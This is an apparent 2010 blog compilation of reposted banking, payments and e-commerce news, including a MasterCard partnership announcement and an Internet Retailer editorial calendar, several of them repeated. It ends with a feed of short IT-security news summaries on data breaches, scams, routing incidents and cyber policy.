Saturday, April 10, 2010

Should Banks Cover Fraud Losses?





E-News

Week of April 5, 2010





The Week in Review from BankInfoSecurity.com

Weekly digest of the week’s top news and views. And don’t miss our new audio week-in-review podcast by Editorial Director Tom Field! Hear the highlights of the week’s biggest stories.
Featured News

Should Banks Cover Fraud Losses?

Vendor Pushes for New Protections for Commercial Accounts

In the wake of lawsuits over "reasonable security," business and bank advocates are at odds over whether federal regulations should be amended to enhance commercial protection.
Photo

Should Banks Cover Fraud Losses?





E-News

Week of April 5, 2010





The Week in Review from BankInfoSecurity.com

Weekly digest of the week’s top news and views. And don’t miss our new audio week-in-review podcast by Editorial Director Tom Field! Hear the highlights of the week’s biggest stories.
Featured News

Should Banks Cover Fraud Losses?

Vendor Pushes for New Protections for Commercial Accounts

In the wake of lawsuits over "reasonable security," business and bank advocates are at odds over whether federal regulations should be amended to enhance commercial protection.
Photo

MasterCard Announces Three Year Agreement with Next Jump, Inc.

PYMNTS.com talks about MasterCard's partnership with Next Jump, Inc.












BREAKING NEWS
MC Logo MasterCard Worldwide today announced a three-year exclusive alliance in the payments space with Next Jump, Inc., a next-generation e-commerce company, to revolutionize the online shopping experience.



The strategic agreement will allow the companies to work together to harness their combined assets in the payments technology, e-commerce and digital marketing space to drive innovation for the industry and improve the consumer experience. It will also give MasterCard access to Next Jump's extensive aggregated e-commerce network, human capital through its digital technology engineers, and an agile development process to fuel innovation and drive speed to market for relevant and desirable e-commerce solutions that meet consumer demands.

READ MORE



Joshua Peirez, Group Head of Innovative Platforms, MasterCard Worldwide and Charlie Kim, Founder and CEO of Next Jump discuss the exclusive alliance to revolutionize the consumer e-commerce experience. WATCH VIDEO






Related articles by Zemanta

Reblog this post [with Zemanta]

MasterCard Announces Three Year Agreement with Next Jump, Inc.

PYMNTS.com talks about MasterCard's partnership with Next Jump, Inc.












BREAKING NEWS
MC Logo MasterCard Worldwide today announced a three-year exclusive alliance in the payments space with Next Jump, Inc., a next-generation e-commerce company, to revolutionize the online shopping experience.



The strategic agreement will allow the companies to work together to harness their combined assets in the payments technology, e-commerce and digital marketing space to drive innovation for the industry and improve the consumer experience. It will also give MasterCard access to Next Jump's extensive aggregated e-commerce network, human capital through its digital technology engineers, and an agile development process to fuel innovation and drive speed to market for relevant and desirable e-commerce solutions that meet consumer demands.

READ MORE



Joshua Peirez, Group Head of Innovative Platforms, MasterCard Worldwide and Charlie Kim, Founder and CEO of Next Jump discuss the exclusive alliance to revolutionize the consumer e-commerce experience. WATCH VIDEO






Related articles by Zemanta

Reblog this post [with Zemanta]

Internet Retailer Top 500 - The Big get Bigger...













Topics and Categories Covered
2010 Top 500 Preview
Web Site Design
Mobile Commerce
Fulfillment
Social Marketing
Multichannel Strategy
Rich Media
Executive Compensation
Search Engine Optimization
Store Systems
Cross-channel Marketing
Supply Chain Technology


WebDesignGuideJune 2010 Cover story:

The 2010 Internet Retailer Top 500—the big get bigger


The results are in and they show the largest online retailers took market share during recession-wracked year 2009. The Top 500 online retailers sold nearly 11% more last year, while e-commerce as a whole grew only about 2%. Even without Amazon, the leading e-retailers outpaced the market. That's just one of many insights in this summary of data from the Internet Retailer Top 500 Guide, the most authoritative ranking of e-retailing. This much-anticipated feature highlights the top performers among web-only retailers, retail chains, consumer goods manufacturers and catalogers. This special section also profiles the best of the best, and provides insights into the secrets of their success.
Mobile commerce: How Top 500 retailers are selling via mobile

Twice the number of Top 500 retailers are selling to consumers via their mobile phones this year than a year ago. This story examines their strategies, the features of their mobile sites and apps, and where they're finding mobile expertise. And it will report on how m-commerce team fits into the org chart.

Social marketing: The elusive ROI of social media

Marketing on social networks is an inexpensive way to reach millions of consumers. But do they want to be reached on Facebook and Twitter? This story will examine the costs in staff time and technology, and weigh them against the benefits retailers have realized from their social marketing initiatives.

Rich media: Mining the riches of rich media

Consumers want to see products in every detail, and making that possible remains one of the biggest challenges for online retailers. As a result, rich media is among the biggest areas of investment by e-commerce technology providers. This story will look at the latest advances in rich media and report on how consumers respond to them—and whether they're worth the investment.


Search engine optimization: Five tips for moving up in Google search results

Google is constantly changing how it displays search results and modifying its ranking rules—without letting marketers in on its secrets. This story will report on some of the latest changes to provide five tips for winning on Google.


Cross-channel marketing: Finding useful information in oceans of data

With each new consumer touchpoint more data accumulates—and the challenge of getting a single view of the consumer becomes more complex. This story will look at the latest technology advances, how retailers are using them, and the benefits they realize from having a complete view of their customers' behavior.

E-commerce developments: How the top women in e-retailing made it to the top

This story will draw on an exclusive Internet Retailer survey of women in e-commerce to document their experiences, the obstacles they've faced and their tactics for getting ahead. It will also profile women leaders and highlight their advice for younger women. It will also look at how the pay of women e-retail executives compares to that of their male counterparts.


Web site design: What does it cost to redesign a retail web site?

This story will report on the experiences of retailers that have redesigned their web sites in-house and those that have used outside firms to explain how to cost out a redesign. It will include the considerable time that retailer personnel will have to spend on the project, even if an outside firm is doing much of the design work and highlight key pitfalls to avoid.

Fulfillment: Want to offer free shipping? Plan out fulfillment now

This story will examine how retailers plan ahead so they can make shipping offers without cutting too deeply into margins. It will provide tips on negotiating deals with carriers, technologies that optimize shipping methods, and how sharing plans with carriers can help keep costs down.


Multichannel strategy: The once-lowly store locator becomes a selling toolAs more consumers research on the web before shopping in stores, more of them visit the store locator page to find addresses, maps, phone numbers and hours. Recognizing that those web pages get a lot of visits, some retailers are spiffing them up. This story will examine what retail chains gain from turning store locator pages into marketing tools, and what it costs to keep information up to date and respond to customer queries.

E-commerce developments: Money talks – what executives' paychecks say about online commerceThis exclusive Internet Retailer survey of the compensation of e-retail executives will show how retailers value their e-commerce leaders. Based on an analysis of the annual compensation reports of publicly traded retailers, this story ranks the highest-paid execs, show how they fared in the tumultuous year just past and analyze what these figures show about the place of e-commerce in major retail organizations.

Mobile commerce: QVC's mobile trifectaTV and the web have been the sales channels for QVC, and mobile is now the third. The home shopping retailer has gone mobile with gusto, and is among the few retailers that lets consumers shop via a mobile site, a mobile app and by responding to text messages. This story provides a mobile leader's take on the technology required and the marketing and merchandising lessons it's drawn.

Executive profile: The one-woman encyclopedia of e-commerce technologyHalley Silver is a popular speaker at e-commerce conferences because of her broad knowledge of e-commerce technology, and her engaging way of explaining technical matters to non-technical managers. This story will look at how she learned so much, how she keeps up, and how it helps her do her job better.

Web site design: Why show consumers your competitors' prices?Such major e-commerce players as Amazon, Buy.com and Overstock show site visitors what competitors are charging. Does this tactic promote conversion and customer loyalty? Or do customers leave for other sites offering lower prices? This story will provide the answer, based on the experiences of top e-retailers.

Corporate strategies: Web-only Shoplet.com takes on the office supply giants The big office supply chains—Staples, Office Depot and OfficeMax—have invested heavily in the web to serve their mostly small business customers. But they still have to offset the costs of their stores. Shoplet.com seeks to take market share by leveraging the lower cost of a web-only operation. This profile will examine Shoplet's claim that it can operate more cheaply than stores—and highlight the lessons other e-retailers can learn from this fast-growing company.

WebDesignGuideStore systems: Do consumers want to shop the web from stores?

Many retail chains are betting they do, introducing more web-enabled kiosks to extend store selection. This story will dig into how much consumers order online from stores, what other benefits retailers gain from in-store devices, the cost of deploying them and training employees to use them, and whether this is a real trend or a desperate move by stores to withstand online competition.

E-commerce developments: Making sense of the conflicting estimates of e-retail's growth

Several organizations estimate the growth of online retailing, but they never quite agree, which raises questions about whose numbers to trust. This story will delve into how each organization comes up with their estimates and report on how online retailers reconcile these numbers in order to plan for the coming years.

Supply chain: Putting visibility to suppliers to work to improve profitsThe Internet ties together the retail supply chain, from manufacturer through the SKU on a store shelf or in a warehouse. But all this data has to be put to work in an intelligent way. This story looks at the latest supply chain technology that helps turn data into useful information and, most importantly, profit.





Advertising Material Deadlines
Space Close:
May 7, 2010
Materials Due:
May 14, 2010

Internet Retailer Top 500 - The Big get Bigger...













Topics and Categories Covered
2010 Top 500 Preview
Web Site Design
Mobile Commerce
Fulfillment
Social Marketing
Multichannel Strategy
Rich Media
Executive Compensation
Search Engine Optimization
Store Systems
Cross-channel Marketing
Supply Chain Technology


WebDesignGuideJune 2010 Cover story:

The 2010 Internet Retailer Top 500—the big get bigger


The results are in and they show the largest online retailers took market share during recession-wracked year 2009. The Top 500 online retailers sold nearly 11% more last year, while e-commerce as a whole grew only about 2%. Even without Amazon, the leading e-retailers outpaced the market. That's just one of many insights in this summary of data from the Internet Retailer Top 500 Guide, the most authoritative ranking of e-retailing. This much-anticipated feature highlights the top performers among web-only retailers, retail chains, consumer goods manufacturers and catalogers. This special section also profiles the best of the best, and provides insights into the secrets of their success.
Mobile commerce: How Top 500 retailers are selling via mobile

Twice the number of Top 500 retailers are selling to consumers via their mobile phones this year than a year ago. This story examines their strategies, the features of their mobile sites and apps, and where they're finding mobile expertise. And it will report on how m-commerce team fits into the org chart.

Social marketing: The elusive ROI of social media

Marketing on social networks is an inexpensive way to reach millions of consumers. But do they want to be reached on Facebook and Twitter? This story will examine the costs in staff time and technology, and weigh them against the benefits retailers have realized from their social marketing initiatives.

Rich media: Mining the riches of rich media

Consumers want to see products in every detail, and making that possible remains one of the biggest challenges for online retailers. As a result, rich media is among the biggest areas of investment by e-commerce technology providers. This story will look at the latest advances in rich media and report on how consumers respond to them—and whether they're worth the investment.


Search engine optimization: Five tips for moving up in Google search results

Google is constantly changing how it displays search results and modifying its ranking rules—without letting marketers in on its secrets. This story will report on some of the latest changes to provide five tips for winning on Google.


Cross-channel marketing: Finding useful information in oceans of data

With each new consumer touchpoint more data accumulates—and the challenge of getting a single view of the consumer becomes more complex. This story will look at the latest technology advances, how retailers are using them, and the benefits they realize from having a complete view of their customers' behavior.

E-commerce developments: How the top women in e-retailing made it to the top

This story will draw on an exclusive Internet Retailer survey of women in e-commerce to document their experiences, the obstacles they've faced and their tactics for getting ahead. It will also profile women leaders and highlight their advice for younger women. It will also look at how the pay of women e-retail executives compares to that of their male counterparts.


Web site design: What does it cost to redesign a retail web site?

This story will report on the experiences of retailers that have redesigned their web sites in-house and those that have used outside firms to explain how to cost out a redesign. It will include the considerable time that retailer personnel will have to spend on the project, even if an outside firm is doing much of the design work and highlight key pitfalls to avoid.

Fulfillment: Want to offer free shipping? Plan out fulfillment now

This story will examine how retailers plan ahead so they can make shipping offers without cutting too deeply into margins. It will provide tips on negotiating deals with carriers, technologies that optimize shipping methods, and how sharing plans with carriers can help keep costs down.


Multichannel strategy: The once-lowly store locator becomes a selling toolAs more consumers research on the web before shopping in stores, more of them visit the store locator page to find addresses, maps, phone numbers and hours. Recognizing that those web pages get a lot of visits, some retailers are spiffing them up. This story will examine what retail chains gain from turning store locator pages into marketing tools, and what it costs to keep information up to date and respond to customer queries.

E-commerce developments: Money talks – what executives' paychecks say about online commerceThis exclusive Internet Retailer survey of the compensation of e-retail executives will show how retailers value their e-commerce leaders. Based on an analysis of the annual compensation reports of publicly traded retailers, this story ranks the highest-paid execs, show how they fared in the tumultuous year just past and analyze what these figures show about the place of e-commerce in major retail organizations.

Mobile commerce: QVC's mobile trifectaTV and the web have been the sales channels for QVC, and mobile is now the third. The home shopping retailer has gone mobile with gusto, and is among the few retailers that lets consumers shop via a mobile site, a mobile app and by responding to text messages. This story provides a mobile leader's take on the technology required and the marketing and merchandising lessons it's drawn.

Executive profile: The one-woman encyclopedia of e-commerce technologyHalley Silver is a popular speaker at e-commerce conferences because of her broad knowledge of e-commerce technology, and her engaging way of explaining technical matters to non-technical managers. This story will look at how she learned so much, how she keeps up, and how it helps her do her job better.

Web site design: Why show consumers your competitors' prices?Such major e-commerce players as Amazon, Buy.com and Overstock show site visitors what competitors are charging. Does this tactic promote conversion and customer loyalty? Or do customers leave for other sites offering lower prices? This story will provide the answer, based on the experiences of top e-retailers.

Corporate strategies: Web-only Shoplet.com takes on the office supply giants The big office supply chains—Staples, Office Depot and OfficeMax—have invested heavily in the web to serve their mostly small business customers. But they still have to offset the costs of their stores. Shoplet.com seeks to take market share by leveraging the lower cost of a web-only operation. This profile will examine Shoplet's claim that it can operate more cheaply than stores—and highlight the lessons other e-retailers can learn from this fast-growing company.

WebDesignGuideStore systems: Do consumers want to shop the web from stores?

Many retail chains are betting they do, introducing more web-enabled kiosks to extend store selection. This story will dig into how much consumers order online from stores, what other benefits retailers gain from in-store devices, the cost of deploying them and training employees to use them, and whether this is a real trend or a desperate move by stores to withstand online competition.

E-commerce developments: Making sense of the conflicting estimates of e-retail's growth

Several organizations estimate the growth of online retailing, but they never quite agree, which raises questions about whose numbers to trust. This story will delve into how each organization comes up with their estimates and report on how online retailers reconcile these numbers in order to plan for the coming years.

Supply chain: Putting visibility to suppliers to work to improve profitsThe Internet ties together the retail supply chain, from manufacturer through the SKU on a store shelf or in a warehouse. But all this data has to be put to work in an intelligent way. This story looks at the latest supply chain technology that helps turn data into useful information and, most importantly, profit.





Advertising Material Deadlines
Space Close:
May 7, 2010
Materials Due:
May 14, 2010

Internet (Lack of) Security News through 4/10










This Free IT-Security news feed is provided by E-Secure-IT; the most comprehensive and complete Business Risk Management Intelligence Service and IT-Security Risk and Threat Early Warning Service available in the market today.  Visit us at www.e-secure-it.com or email more-info@e-secure-it.com for more information on our available services.



























































































































































































































































































































































































































 Managing the aftermath of a loss or personal data 
 (from amberhawk at 10-4-2010) 
 If readers want to examine an interesting example of how to manage a data loss, have a look at what happened at the London Borough of Barnet (see references). A data loss involving 9,000 children followed a burglary of the home of a member of staff. The loss included the Council’s computer equipment (a laptop), CD Roms and memory sticks along with other items from the house. Like most organisations, the Council had implemented procedures and policies to ensure that the personal data on the co... read more» 
   
 





 When Security Measures Don't Catch Anyone 
 (from voltage at 10-4-2010) 
 Suppose you implement a security measure. Maybe it's a home alarm, maybe it's a security checkpoint before entering a building, it might even be putting tighter login requirements to a network. In IT, fake security would work even less effectively. Someone might not pay for email encryption, but still say, "You can't read this email, it's encrypted." It would take very little effort to see that the statement is false. How about someone announcing that they have just implemented new measures t... read more» 
   
 





 Who Discovers More Corporate Fraud: Whistleblowers, Regulators, or Journalists? 
 (from Project On Government Oversight at 10-4-2010) 
 A new study in the Journal of Finance offers a friendly reminder of the key role whistleblowers play in rooting out fraud, waste and abuse, finding that corporate fraud is more likely to be detected by an employee from within a firm, rather than external auditors, government regulators, self-regulatory organizations, or the media. The study examined a total of 216 cases of alleged corporate fraud. Employees, i.e. whistleblowers, were responsible for revealing the fraud in 17 percent of cases... read more» 
   
 





 Murdoch hacks grumble over outsourced IT failures 
 (from The Register at 10-4-2010) 
 To picturesque Wapping, where unrest among hacks and techies about recent IT cuts at News International is bubbling following a 24-hour email outage yesterday that crippled newsrooms and commercial operations alike. Cast in the role of villain is CIO Andrew Hickey, the man responsible for a broad IT outsourcing deal in December that has seen many functions taken over by HCL, of Noida, near New Delhi.... read more» 
   
 





 Getting Inside the Mind of a Hacker 
 (from Wall Street Journal at 10-4-2010) 
 When it was discovered earlier this year that hackers in Europe and China had successfully broken into computers at close to 2,500 companies and government agencies around the globe, Derek Manky was on the job, helping to minimize damage and coordinate a defense. "In a nutshell, my job is fighting cyber crime," says Mr. Manky who works in cyber security and threat research for Fortinet Inc., a computer network security company. For a lot of people, cyber security management is an unfamiliar j... read more» 
   
 





 China routing snafu briefly mangles interweb 
 (from The Register at 10-4-2010) 
 Bad routing information sourced from China has disrupted the internet for the second time in a fortnight. Global BGP (Border Gateway Routing) lookup tables sucked in data from a small ISP called IDC China Telecommunication, apparently accidentally broadcast by state-owned carrier China Telecommunications, IDG reports. ISPs including AT&T, France Telcom, Level3, Deutsche Telekom, Qwest and Telefonica accepted ill-thought out traffic routes as a result of the incident.... read more» 
   
 





 Conservatives outline £12bn public sector savings plan 
 (from BBC at 10-4-2010) 
 The Tories have detailed how public spending could be cut by £12bn to fund their pledge on National Insurance. Tory leader David Cameron said cuts to IT projects, office costs, contracts and recruitment were "do-able". Labour has dismissed the savings, some of which the Tories would use to curb a planned NI rise, as a "fantasy". Labour and the Liberal Democrats say the savings would mean public sector job cuts while the Tories say an NI rise is a "jobs killer" for firms.But Conservative advis... read more» 
   
 





 What’s new and improving about IT today? 
 (from The Register at 10-4-2010) 
 For anyone who has been in IT for a while, all that new and improved stuff can quite quickly feel like the same-old-same-old, repackaged for the latest generation of supposedly tech-literate masses. Still, the “I’ve seen it all before” game can be a dangerous one to play. It is too easy (for example) to look at social media and relate it back to USENET newsgroups, or compare the current generation of mobile devices with Psion organisers. Good as all of these things were, they were different –... read more» 
   
 





 Another email threat 
 (from TelegraphIndia at 10-4-2010) 
 Even before the police could crack the source of the email threat sent to chief minister Naveen Pattnaik on March 27, his office received yet another email last night threatening a repeat of the Dantewada massacre in Orissa, if the joint operation against Maoists was not stopped. The email, like the previous one, has been sent from the id plga.ocac.in and takes responsibility for the death of 11 policemen in Sunday’s blast at Koraput. It has threatened to invade the official website of the st... read more» 
   
 





 Cyber-Spin: How the Internet Gets Framed as Dangerous 
 (from circleID at 10-4-2010) 
 At the beginning of this year, a set of powerhouse organizations in cybersecurity (CSO Magazine, Deloitte, Carnegie Mellon's CERT program, and the U.S. Secret Service) released the results of a survey of 523 business and government executives, professionals and consultants in the ICT management field. The reaction generated by this survey provides an unusually clear illustration of how cyber-security discourse has become willfully detached from facts. There is an organized industrial and poli... read more» 
   
 





 Internet filter according to Yes Minister 
 (from ZDNet at 10-4-2010) 
 In the realm of internet filtering, we can see the Politician's Syllogism quite plainly: internet is full of naughty. A filter can stop naughty. Therefore we must filter the internet. Now the issue here is that people who know the internet know that a filter is unworkable. However, this is based on the assumption that knowledgeable internet people are the target audience. This is, of course, incorrect.The audience is made up of a group of people who: 1. are afraid of the internet and/or ... read more» 
   
 





 Wikifounder reports Wikiparent to FBI over 'child pxxx' 
 (from The Register at 10-4-2010) 
 Wikipedia co-founder Larry Sanger has reported the site's parent organization to the Federal Bureau of Investigation, saying he believes the Wikimedia Commons "may be knowingly distributing child pxxxography." Earlier this week, Sanger disclosed his FBI report with a post to a public mailing list and later an open letter to a member of the Wikimedia Foundation's board of trustees. In the letter, he also says he notified his Senators and Congressional representatives over the images in questio... read more» 
   
 





 Indian outsourcers emphasize cosmetic security measures, Forrester warns 
 (from Computer World at 10-4-2010) 
 Companies who send software development work to India need to ensure that their vendors take holistic measures to protect data and aren't simply "checking the box" on security issues, Forrester Research warned this week. Many Indian companies have bolstered their security controls and business continuity measures in recent years, Forrester said in a report. But the lack of executive support for security efforts, an over-reliance on technology controls and inadequate training and awareness und... read more» 
   
 





 Ikea gift card scam takes in nearly 40,000 Facebook users 
 (from Network World at 10-4-2010) 
 A scam Facebook page offering the site's users a $1,000 Ikea gift card took in nearly 40,000 victims Friday. It's the latest example of a new and pernicious trend on the social-networking site as scammers usually disreputable online marketers trying to earn revenue by generating Web traffic have flooded Facebook with these fake gift card pages over the past months. In late March, a similar $1,000 Ikea gift card scam took in more than 70,000 victims, and just last week another scam Facebook... read more» 
   
 





 US: al-Qaida exemplifies new-age nuclear threat 
 (from FOXNews at 10-4-2010) 
 The White House on Friday warned that al-Qaida is quietly hunting for an atomic bomb, adding urgency to a historic summit next week where President Barack Obama will try to persuade world leaders to step up efforts to keep nuclear weapons out of terrorist hands. Expectations for decisive action by the 47 countries are low, because existing controls haven't worked as well as hoped and some nations worry tighter regulation will only slow civilian nuclear power projects. But the White House h... read more» 
   
 





 Browsers shouldn't carry the can for poor security 
 (from ZDNet at 10-4-2010) 
 Last month, Microsoft started offering Windows users a choice of 12 browsers, as part of a deal with the European Commission. Microsoft's browser-ballot screen has exposed millions of users to a choice that in many cases they may not have even been aware they were able to make. The ballot pop-up in Windows presents users with a randomised list of the five most popular applications for browsing the web — Internet Explorer, Mozilla Firefox, Safari, Opera, Google Chrome — plus seven others less ... read more» 
   
 





 Security Guru Richard Clarke Talks Cyberwar 
 (from Forbes at 10-4-2010) 
 Richard Clarke, the antiterrorism czar under Bill Clinton, George H.W. Bush and George W. Bush, knows something about spotting national security threats in the making: In 2001 he repeatedly warned the Bush administration about the threat of al Qaeda in the months and weeks leading up to the Sept. 11 attacks--and was ignored. Nine years later his national security concerns have shifted to the cyber realm, as he's laid out in detail in a new book, Cyber War: The Next Threat to National Security... read more» 
   
 





 Arkansas Mom Charged After 'Hacking' Son's Facebook Account 
 (from EWeek at 10-4-2010) 
 An Arkansas mother has been charged with harassment for accessing her 16-year-old son’s Facebook account and posting messages. The mother, Denise New of Arkadelphia, was hit with the misdemeanor charge March 26, after her son, Lane, filed a complaint with the Clark County Prosecutor's Office. According to reports, the younger New accused his mom of hacking into his Facebook account, changing his e-mail and Facebook passwords and posting slanderous Facebook messages about his private life.... read more» 
   
 





 HNNCast for the first week of April 2010 
 (from Security Tube at 9-4-2010) 
 HNNCast for the first week of April 2010 Lead Stories * Heartland a Harvest of Chronic Chaos, Yahoo! 2nd to Google at Everything, Symantec Speaks on China Crackers, The Lightzz- the Soundzz- the Rhythmzz- the Noizze, 0day What a Feeling!- Adobe News * CalTech OPFOR, Honeynet Forensic Challenge- Round 3, Cross Days Ahead for t00n-pr0n pir8s, Gettin Keykeriki wit It Quickies * Nmap 5.030BETA1, Prisoners Phreak-Out, Quip Users Irked re:Privacy, Student/Teacher Con-frence, NSF Gran... read more» 
   
 





 Big Changes for the Security Bloggers Network 
 (from ashimmy at 9-4-2010) 
 We have almost 300 member blogs in the SBN feed. Virtually all of the security commentary fit to print. It probably represents the biggest collection of security content in the world. I have some other great ideas that I want to put into the SBN site. Tips and tricks for better blogging. Getting the security blogging industry blogging again. Perhaps tying in a twitter stream and security tweeters (have to speak to the security twits). ... read more» 
   
 





 Q&A: Cyber warfare 
 (from Net-Security at 9-4-2010) 
 There have been various incidents that could be described as acts of cyber warfare. The Cyber-attacks against Estonian systems in starting in April 2006 with data-flooding attacks on key government websites, culminating on a coordinated Distributed Denial of Service (DDoS) attacks on key government, financial and media sites in May 2006 certainly would fall under this category.... read more» 
   
 





 Trojan-driven keylogger attacks are on the rise 
 (from SecurityPark at 9-4-2010) 
 Visa has issued an alert to its transaction processing members and their clients - retailers of all sizes - that trojan-driven keylogger incidents are on the rise. According to Trusteer, the rising number of keylogger attacks on retailers' till terminals is due to the fact that many units are Windows-driven and therefore susceptible to the same type of malware infections as office and home PCs. "Trojan-driven keylogger attacks have been on the rise for home and office PC users for some time, ... read more» 
   
 





 Credit card dumping on the rise 
 (from viewfromthebunker at 9-4-2010) 
 At Symantec we’ve noted a worrying increase in so-called “credit card dumps” on offer in the criminal underworld over the past year. Dumps, which are copies of the information stored on the magnetic stripe of the original card, are usually obtained via electronic “skimming devices” fitted to the credit card machine or bank teller. The devices often take the form of an additional card reader that is placed over the original and records any data that passes through it. Skimming devices can b... read more» 
   
 





 EU data laws force e-Borders' compromise 
 (from ZDNet at 9-4-2010) 
 Data protection laws in other European countries will decide whether the UK Border Agency receives information on those travelling to Britain. A report from Parliament's Home Affairs Select Committee reveals that the European Commission has told the UK Border Agency (UKBA) it will not be able to refuse entry to EU citizens and their family members whose passenger data is not available to the £1.2bn e-Borders system. In addition, transport providers will be instructed not to deny boarding ... read more» 
   
 





 Cyber attack cripples Free Malaysia Today 
 (from hostexploit at 9-4-2010) 
 A massive cyber attack on the Free Malaysia Today web site over the past week has disrupted operations and left readers without access to news articles on the site. Legal action is now being contemplated against the Malaysian website and the hosting company from which the attacks came. Free Malaysia Today management said: "We have identified the attackers and traced the attacks as coming through a popular Malaysian cyber forum based on servers located in Kuala Lumpur.... read more» 
   
 





 Once a rising tech star in Seattle, now a federal prisoner 
 (from hostexploit at 9-4-2010) 
 What does a USD30,000 gold watch cost? How about two of them? If federal prosecutors prove correct in their assertions, a pair of watches could cost a Seattle businessman -- accused of fraud -- decades of hard time. That much was clear from the charges filed in U.S. District Court late last month against Mark Phillips, a 35-year-old tech executive facing two counts o f wire fraud.... read more» 
   
 





 UK Bill Targets Internet File Sharing, Jeopardizes Open WiFi 
 (from Wired at 9-4-2010) 
 An unpopular plan to tax British fixed-line phone users to help roll-out a high-speed broadband network and other controversial proposals have been dropped in the final push to get the Digital Economy bill passed into law. Parliament’s lower house passed the overall bill late Wednesday night despite protests from some members, after certain elements were stripped out in the final negotiations. The most high profile aspect of the proposed legislation — to disconnect or slow down the Web acc... read more» 
   
 





 Kyrgyzstan has its revolution but no cyber warfare – why? 
 (from intelfusion at 9-4-2010) 
 The country of Kyrgyzstan is in the midst of a revolution as former President Kurmanbek Bakiyev is in hiding and its Prime Minister and the rest of the Kyrgyzstan government has resigned. The interim government is headed by Roza Otunbaeva and a 13 member cabinet; two of whom met with former PM Daniar Usenov to secure his resignation yesterday according to this report by Radio Free Europe.... read more» 
   
 





 German minister of consumer protection criticises Facebook's proposed third party sharing policy, as the site moves to clarify its plans 
 (from scmagazineuk at 9-4-2010) 
 The German federal minister of consumer protection Ilse Aigner has written an open letter to Facebook CEO Mark Zuckerberg criticising recent changes to data protection regulations on the website. Published on the Spiegel online website, Aigner claimed that she was ‘astonished' to discover that the social networking site was relaxing data protection regulations on the network even further despite the concerns of users and severe criticism from consumer activists.... read more» 
   
 





 Cloud computing risks outweigh benefits, survey finds 
 (from TechTarget at 9-4-2010) 
 A new survey is finding a continued level of angst among IT professionals administering cloud computing projects within their organizations. The survey of more than 1,800 U.S.-based IT professionals found that 48% said Software as a Service (SaaS) and cloud computing risks outweigh the benefits. By contrast, 55% said the risks are either appropriately balanced or are outweighed by the benefits. The survey was conducted by Rolling Meadows, Ill.-based Information Systems Audit and Control Assoc... read more» 
   
 





 Private sector key to thwarting 'Google-style' cyber attacks 
 (from IT Business at 9-4-2010) 
 White House Cybersecurity Coordinator Howard Schmidt says the information security community is right to be spooked by massive, coordinated attacks that recently targeted Google. But he rejects the notion that this is cybergeddon, and believes the best defense remains in the hands of the private sector. "You guys have been carrying the water," Schmidt told attendees at CSO Perspectives 2010 Tuesday. The government can do a lot to improve the nation's cyber defenses. But ultimately, he said, t... read more» 
   
 





 Illegal downloaders face life net ban 
 (from townsvillebulletin at 9-4-2010) 
 Claims Google will be blocked, Wikileaks shut down and pirates banned for life under new UK law. Sky News reported the Digital Economy Bill aims to stop people from illegally downloading copyrighted material from the internet, but critics argue it could have far greater powers and be used to censor and block free speech by ruling politicians. The bill was rushed through the legislature before the dissolution of Parliament next Monday, ahead of next month's national election. It was pass... read more» 
   
 





 Facebook boycott called over privacy concerns 
 (from ComputerWorldUk at 9-4-2010) 
 A German consumer group has warned users not to use Facebook if the social-networking company fails to withdraw the proposed changes to its privacy policy. Last month, Facebook announced that it was considering changing its privacy policy to allow information to passed on to third-parties without users giving their consent. VZBV, an umbrella organisation representing consumer groups across Germany, has said that the American company has "repeatedly and deliberately crossed data protection ... read more» 
   
 





 Cyber security tips for external affairs ministry officials 
 (from Netindia123 at 9-4-2010) 
 An e-mail is not just a digital message, it is a potential spying instrument - this, and other lessons are being drilled into the minds of officials of ministry of external affairs (MEA) through a series of internal workshops that started last month. It was in late 2008 that the attacks against the MEA's computer network were first detected - most of them were tracked to Chengdu in China, which led to an overhaul of the hardware and the establishment of a unified threat management system, wit... read more» 
   
 





 Data Breaches Cost Australian Companies AUS$1.97 Million 
 (from hostexploit at 9-4-2010) 
 Australian organizations experience costly data breaches with the average organizational cost of a data breach, including activities intended to prevent a loss of customer or consumer trust, at AUS$1.97 million and the average cost per compromized record at AUS$123. The most expensive data breach cost one organization surveyed more than AUS$4 million to resolve, according to the 2009 Annual Study: “Australian Cost of a Data Breach” report − the first of its kind to quantify the costs a... read more» 
   
 





 Twitter among tools used by hackers; Cda vulnerable with no policy: report 
 (from squamishchief at 9-4-2010) 
 Ottawa must take urgent action on cyberspace security, or risk falling victim to targeted attacks by hackers using social media such as Twitter to glean secret government or corporate information, Canadian researchers said Tuesday. The team of researchers from the University of Toronto and Ottawa-based SecDev Group released a report Tuesday documenting a complex cyber espionage system of Chinese hackers. Twitter and email were among the tools used to access highly sensitive documents from ... read more» 
   
 





 New vacancies at ENISA 
 (from Enisa at 9-4-2010) 
 I would like to inform you that the following two vacancy notices have been published at ENISA's website: ENISA-TA-AD-2010-04: Expert in Security and Resilience of Communication Networks - Deadline 03/05/2010 ENISA-CA-III-2010-03: Security and Resilience of Communication Networks Officer - Deadline 03/05/2010 The deadline of the SNE (National Experts Seconded to ENISA) vacancy Ref. ENISA-SNE-2010-01 has been extended until 12th April 2010. ... read more» 
   
 





 IG: DOJ, FBI have lost sight of identity theft priorities 
 (from fierce governmentit at 9-4-2010) 
 Identity theft is a major threat to millions of Americans but a new inspector general audit of the Justice Department worries efforts against it are falling by the wayside. In 2008, identity theft was the fastest growing crime, claiming 10 million victims, according to recent estimates by the Justice Department's Criminal Division. Fighting it became a high priority after President George W. Bush signed a May 2006 executive order creating the President's Identity Theft Task Force, but since ... read more» 
   
 





 How To Nail An Interview (20 Tips) 
 (from howtonailaninterview at 9-4-2010) 
 What is it that certain people say or do while interviewing that makes them stand out? Why do some people struggle to find work, while others land a job in no time? I wanted to know, and the only way to find out was to experience the interview from the other side of the table. If I could be the one asking the interview questions, not answering, I could see first hand what made candidates stand out. I could then take that knowledge and cater my behavior in any future job interview to give myself ... read more» 
   
 





 London Underground line hit by IT failure 
 (from IT Pro at 9-4-2010) 
 London’s transport network took a massive hit yesterday after an IT error left travellers without the use of the Circle Line for several hours. The underground line was closed for the entire morning rush after computers used to control signals, dating back to the 1980s, were found to have burnt out. Although some of the line was up and running again quickly, many parts remained suspended for the rest of the day. Delays were still troubling commuters this morning on the line, with suspensions ... read more» 
   
 





 ISAlliance Expresses Tentative Support for Cyber Legislation 
 (from infosecisland at 9-4-2010) 
 On Wednesday, March 24, the Senate Commerce Committee became the first Congressional Committee to approve a comprehensive cybersecurity bill. The "kill-switch" provision (turning off the Internet) and federally mandated technical standards on the private sector have been eliminated from earlier versions of the legislation and the bill now embraces private sector standards and market incentives. The bill still needs additional changes before industry can support floor action, but many of th... read more» 
   
 





